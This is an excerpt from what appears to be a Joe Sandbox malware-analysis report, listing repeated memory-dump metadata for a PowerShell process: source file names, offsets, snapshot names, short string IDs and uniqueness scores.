                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $^q$$^q$$^q$$^q
                                    • API String ID: 0-2125118731
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $^q$$^q$$^q$$^q
                                    • API String ID: 0-2125118731
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$$^q$$^q
                                    • API String ID: 0-2049395529
                                    Uniqueness

                                    Uniqueness Score: -1.00%